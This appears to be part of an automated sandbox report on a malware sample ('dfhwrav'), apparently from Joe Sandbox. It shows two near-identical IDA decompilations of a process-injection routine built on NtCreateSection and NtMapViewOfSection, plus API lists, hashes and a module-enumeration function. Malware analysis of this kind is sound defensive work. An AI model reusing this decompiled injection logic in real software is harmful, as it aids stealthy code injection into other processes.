                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 42ad22074bad18142d7be35822f8386c67ed3ecdea3813d17a0e8b73958593c3
                                                              • Instruction ID: 0e929ec6180768132d2eb4bc3befb4aa6e0e1ce8214f1ba9b47f90b2cd5cc351
                                                              • Opcode Fuzzy Hash: 42ad22074bad18142d7be35822f8386c67ed3ecdea3813d17a0e8b73958593c3
                                                              • Instruction Fuzzy Hash: 9B5108B5900255BFEF219F91CC48FAFBBB8FF85B10F104159FA11BA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014F4 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 245 4014f4-401519 call 4011bb 250 40151b 245->250 251 40151e-401523 245->251 250->251 253 401845-40184d 251->253 254 401529-40153a 251->254 253->251 257 401540-401569 254->257 258 401843-401852 254->258 257->258 267 40156f-401586 NtDuplicateObject 257->267 261 401868 258->261 262 401859-401864 258->262 261->262 263 40186b-40188d call 4011bb 261->263 262->263 267->258 269 40158c-4015b0 NtCreateSection 267->269 271 4015b2-4015d3 NtMapViewOfSection 269->271 272 40160c-401632 NtCreateSection 269->272 271->272 273 4015d5-4015f1 NtMapViewOfSection 271->273 272->258 274 401638-40163c 272->274 273->272 276 4015f3-401609 273->276 274->258 277 401642-401663 NtMapViewOfSection 274->277 276->272 277->258 278 401669-401685 NtMapViewOfSection 277->278 278->258 280 40168b call 401690 278->280 280->258
                                                              C-Code - Quality: 61%
                                                              			E004014F4(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t130;
				signed int _t131;
				void** _t132;
				signed int _t139;
				int _t140;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				long _t172;
				intOrPtr _t174;
				void* _t175;
				HANDLE* _t181;
				HANDLE* _t183;
				void* _t188;
				intOrPtr* _t191;
				void* _t194;
				void* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t201;
				signed int* _t202;
				long _t217;

				_t222 = __fp0;
				_t156 = __edx;
				asm("aam 0x4a");
				_t130 = 0x37e;
				E004011BB(__ecx, _t130, __edx, __edi, __esi, __eflags, __fp0);
				_t127 =  *((intOrPtr*)(_t195 + 8));
				_t172 = 0;
				 *((intOrPtr*)(_t195 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t195 - 0x34)) =  *((intOrPtr*)(_t195 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t195 - 0x5c)) = _t87;
				_t181 = _t195 - 0x60;
				 *_t181 = _t172;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t181);
				_t90 =  *_t181;
				if(_t90 != 0) {
					_t132 = _t195 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t172;
					_t181 = _t195 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
					 *_t181 = 0x18;
					_t156 = _t181;
					_push(_t195 - 0x30);
					_push(_t181);
					_push(0x40);
					_push(_t195 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t195 - 0x10), 0xffffffff, 0xffffffff, _t195 - 0xc, _t172, _t172, 2) == 0) {
						 *(_t195 - 8) = _t172;
						_t98 = _t195 - 0x50;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t183 = _t195 - 0x54;
						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							 *_t25 =  *(_t195 - 0x50);
							_t121 = _t195 - 0x44;
							 *_t121 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t121, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 4) == 0) {
								_t123 = _t195 - 0x3c;
								 *_t123 = _t172;
								if(NtMapViewOfSection( *_t183,  *(_t195 - 0xc), _t123, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 4) == 0) {
									_t194 =  *(_t195 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t194, 0x104);
									 *((intOrPtr*)(_t194 + 0x208)) =  *((intOrPtr*)(_t195 + 0x14));
									 *(_t195 - 8) =  *(_t195 - 8) + 1;
								}
							}
						}
						_t100 = _t195 - 0x50;
						 *(_t100 + 4) = _t172;
						 *_t100 =  *((intOrPtr*)(_t195 + 0x10)) + 0x10000;
						_t181 = _t195 - 0x58;
						if(NtCreateSection(_t181, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t195 - 8) != 0) {
							 *_t46 =  *(_t195 - 0x50);
							_t102 = _t195 - 0x48;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t181, 0xffffffff, _t102, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 4) == 0) {
								_t104 = _t195 - 0x40;
								 *_t104 = _t172;
								_t217 = NtMapViewOfSection( *_t181,  *(_t195 - 0xc), _t104, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 0x20);
								if(_t217 == 0) {
									L17();
									if(_t217 == 0 && _t217 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t157 =  *_t197;
									_t201 =  &(_t197[1]);
									_push(_t157);
									_t106 =  *_t201;
									_t202 =  &(_t201[1]);
									_t158 = _t157 << 5;
									_t159 = _t158 + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc3");
									_t161 = _t160 ^ 0xc66a5524;
									_t197 = _t202 - _t161;
									_t188 =  *((intOrPtr*)(_t195 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t195 + 0xc))));
									_t139 =  *(_t188 + 6) & 0x0000ffff;
									_push(_t188);
									_t162 = _t188;
									if( *((intOrPtr*)(_t195 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t195 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t195 + 0xc)), _t140);
										_t197 =  &(_t197[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t181);
									_t221 =  *((intOrPtr*)(_t195 - 0x34));
									if( *((intOrPtr*)(_t195 - 0x34)) == 0) {
										_push(_t181);
										_t156 = _t181[0xd] -  *(_t195 - 0x40);
										_t191 = _t181[0x28] +  *(_t195 - 0x48);
										__eflags = _t191;
										while(1) {
											__eflags =  *_t191;
											if( *_t191 == 0) {
												break;
											}
											_t174 =  *_t191;
											_t191 = _t191 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t156;
												__eflags =  *((intOrPtr*)(0 +  *(_t195 - 0x48) + _t174));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t181);
										_t172 = 0;
										__eflags = 0;
										_t108 = _t195 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t195 - 0xc), 0, 0, 0, 0, 0, _t181[0xa] +  *(_t195 - 0x40),  *(_t195 - 0x3c), _t108, 0);
									} else {
										L50();
										_pop(_t175);
										_t172 = _t175 - 0x1781;
										 *((intOrPtr*)(_t172 + 0x17b5)) = _t172 + 0x2c1d;
										E00401256(_t127, _t172 + 0x17b5, _t172, _t181, _t221, _t172 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t172 + 0x17da)) = _t172 + 0x2c6d;
										_t156 =  *(_t195 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t197;
				_t198 =  &(_t197[1]);
				_push(0x37e);
				_t131 =  *_t198;
				return E004011BB(_t91, _t131, _t156, _t172, _t181, _t221, _t222);
			}









































                                                              0x004014f4
                                                              0x004014f4
                                                              0x004014f4
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: f1d7e44725552df3b8a433dca4a55b3c946ca18e27db3ab168963acc55609184
                                                              • Instruction ID: 46a14779cbf14933c6859ffc6b63d0487160ef9ff8ab9e0fd5fa9402c868ef7e
                                                              • Opcode Fuzzy Hash: f1d7e44725552df3b8a433dca4a55b3c946ca18e27db3ab168963acc55609184
                                                              • Instruction Fuzzy Hash: 705109B5900255BFEF219F91CC48FEFBBB8FF85B10F104159FA11AA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401501 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 282 401501-401519 call 4011bb 286 40151b 282->286 287 40151e-401523 282->287 286->287 289 401845-40184d 287->289 290 401529-40153a 287->290 289->287 293 401540-401569 290->293 294 401843-401852 290->294 293->294 303 40156f-401586 NtDuplicateObject 293->303 297 401868 294->297 298 401859-401864 294->298 297->298 299 40186b-40188d call 4011bb 297->299 298->299 303->294 305 40158c-4015b0 NtCreateSection 303->305 307 4015b2-4015d3 NtMapViewOfSection 305->307 308 40160c-401632 NtCreateSection 305->308 307->308 309 4015d5-4015f1 NtMapViewOfSection 307->309 308->294 310 401638-40163c 308->310 309->308 312 4015f3-401609 309->312 310->294 313 401642-401663 NtMapViewOfSection 310->313 312->308 313->294 314 401669-401685 NtMapViewOfSection 313->314 314->294 316 40168b call 401690 314->316 316->294
                                                              C-Code - Quality: 61%
                                                              			E00401501(void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t84;
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t129;
				signed int _t130;
				void** _t131;
				signed int _t138;
				int _t139;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t161;
				intOrPtr* _t162;
				long _t171;
				intOrPtr _t173;
				void* _t174;
				HANDLE* _t180;
				HANDLE* _t182;
				void* _t187;
				intOrPtr* _t190;
				void* _t193;
				void* _t194;
				signed int* _t196;
				signed int* _t197;
				signed int* _t200;
				signed int* _t201;
				long _t216;

				_t221 = __fp0;
				_t155 = __edx;
				asm("sbb eax, 0x53f4eb29");
				_t129 = 0x37e;
				E004011BB(_t84, _t129, __edx, __edi, __esi, __eflags, __fp0);
				_t127 =  *((intOrPtr*)(_t194 + 8));
				_t171 = 0;
				 *((intOrPtr*)(_t194 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t194 - 0x34)) =  *((intOrPtr*)(_t194 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t194 - 0x5c)) = _t87;
				_t180 = _t194 - 0x60;
				 *_t180 = _t171;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t131 = _t194 - 0x30;
					 *_t131 = _t90;
					_t131[1] = _t171;
					_t180 = _t194 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t180, 0x18);
					 *_t180 = 0x18;
					_t155 = _t180;
					_push(_t194 - 0x30);
					_push(_t180);
					_push(0x40);
					_push(_t194 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t194 - 0x10), 0xffffffff, 0xffffffff, _t194 - 0xc, _t171, _t171, 2) == 0) {
						 *(_t194 - 8) = _t171;
						_t98 = _t194 - 0x50;
						 *(_t98 + 4) = _t171;
						 *_t98 = 0x5000;
						_t182 = _t194 - 0x54;
						if(NtCreateSection(_t182, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
							 *_t25 =  *(_t194 - 0x50);
							_t121 = _t194 - 0x44;
							 *_t121 = _t171;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t123 = _t194 - 0x3c;
								 *_t123 = _t171;
								if(NtMapViewOfSection( *_t182,  *(_t194 - 0xc), _t123, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
									_t193 =  *(_t194 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t171, _t193, 0x104);
									 *((intOrPtr*)(_t193 + 0x208)) =  *((intOrPtr*)(_t194 + 0x14));
									 *(_t194 - 8) =  *(_t194 - 8) + 1;
								}
							}
						}
						_t100 = _t194 - 0x50;
						 *(_t100 + 4) = _t171;
						 *_t100 =  *((intOrPtr*)(_t194 + 0x10)) + 0x10000;
						_t180 = _t194 - 0x58;
						if(NtCreateSection(_t180, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 &&  *(_t194 - 8) != 0) {
							 *_t46 =  *(_t194 - 0x50);
							_t102 = _t194 - 0x48;
							 *_t102 = _t171;
							if(NtMapViewOfSection( *_t180, 0xffffffff, _t102, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t104 = _t194 - 0x40;
								 *_t104 = _t171;
								_t216 = NtMapViewOfSection( *_t180,  *(_t194 - 0xc), _t104, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 0x20);
								if(_t216 == 0) {
									L18();
									if(_t216 == 0 && _t216 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t156 =  *_t196;
									_t200 =  &(_t196[1]);
									_push(_t156);
									_t106 =  *_t200;
									_t201 =  &(_t200[1]);
									_t157 = _t156 << 5;
									_t158 = _t157 + _t106;
									asm("lodsb");
									_t159 = _t158;
									asm("loop 0xffffffc3");
									_t160 = _t159 ^ 0xc66a5524;
									_t196 = _t201 - _t160;
									_t187 =  *((intOrPtr*)(_t194 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t194 + 0xc))));
									_t138 =  *(_t187 + 6) & 0x0000ffff;
									_push(_t187);
									_t161 = _t187;
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_t162 = _t161 + 0xf8;
										__eflags = _t162;
									} else {
										_t162 = _t161 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t162 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t194 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t194 + 0xc)), _t139);
										_t196 =  &(_t196[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t180);
									_t220 =  *((intOrPtr*)(_t194 - 0x34));
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_push(_t180);
										_t155 = _t180[0xd] -  *(_t194 - 0x40);
										_t190 = _t180[0x28] +  *(_t194 - 0x48);
										__eflags = _t190;
										while(1) {
											__eflags =  *_t190;
											if( *_t190 == 0) {
												break;
											}
											_t173 =  *_t190;
											_t190 = _t190 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t155;
												__eflags =  *((intOrPtr*)(0 +  *(_t194 - 0x48) + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t180);
										_t171 = 0;
										__eflags = 0;
										_t108 = _t194 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t194 - 0xc), 0, 0, 0, 0, 0, _t180[0xa] +  *(_t194 - 0x40),  *(_t194 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t174);
										_t171 = _t174 - 0x1781;
										 *((intOrPtr*)(_t171 + 0x17b5)) = _t171 + 0x2c1d;
										E00401256(_t127, _t171 + 0x17b5, _t171, _t180, _t220, _t171 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t171 + 0x17da)) = _t171 + 0x2c6d;
										_t155 =  *(_t194 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t196;
				_t197 =  &(_t196[1]);
				_push(0x37e);
				_t130 =  *_t197;
				return E004011BB(_t91, _t130, _t155, _t171, _t180, _t220, _t221);
			}










































                                                              0x00401501
                                                              0x00401501
                                                              0x00401501
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: ebf5b87ca574a2093f45f0c1329a303c09540bf947450197218f7952483030ba
                                                              • Instruction ID: bd371bee40ec3abd78cd11d740c8041ac39bc23a5b358860ff84b61223384543
                                                              • Opcode Fuzzy Hash: ebf5b87ca574a2093f45f0c1329a303c09540bf947450197218f7952483030ba
                                                              • Instruction Fuzzy Hash: EF5109B5900259BFEF209F91CC48FDFBBB8FF85B10F144159F911AA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 006FC9EE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 351 6fc9ee-6fca07 352 6fca09-6fca0b 351->352 353 6fca0d 352->353 354 6fca12-6fca1e CreateToolhelp32Snapshot 352->354 353->354 355 6fca2e-6fca3b Module32First 354->355 356 6fca20-6fca26 354->356 357 6fca3d-6fca3e call 6fc6ad 355->357 358 6fca44-6fca4c 355->358 356->355 361 6fca28-6fca2c 356->361 362 6fca43 357->362 361->352 361->355 362->358
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006FCA16
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 006FCA36
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6f8000_dfhwrav.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: 811e594b4d10d3ab581f9b0e5eac66ef17d9ab73989e4cde17baceebdce31c88
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 50F0C23520031C6BD7206AF9998CABA76E9AF48335F100128E742D11C0DB70FC458A60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

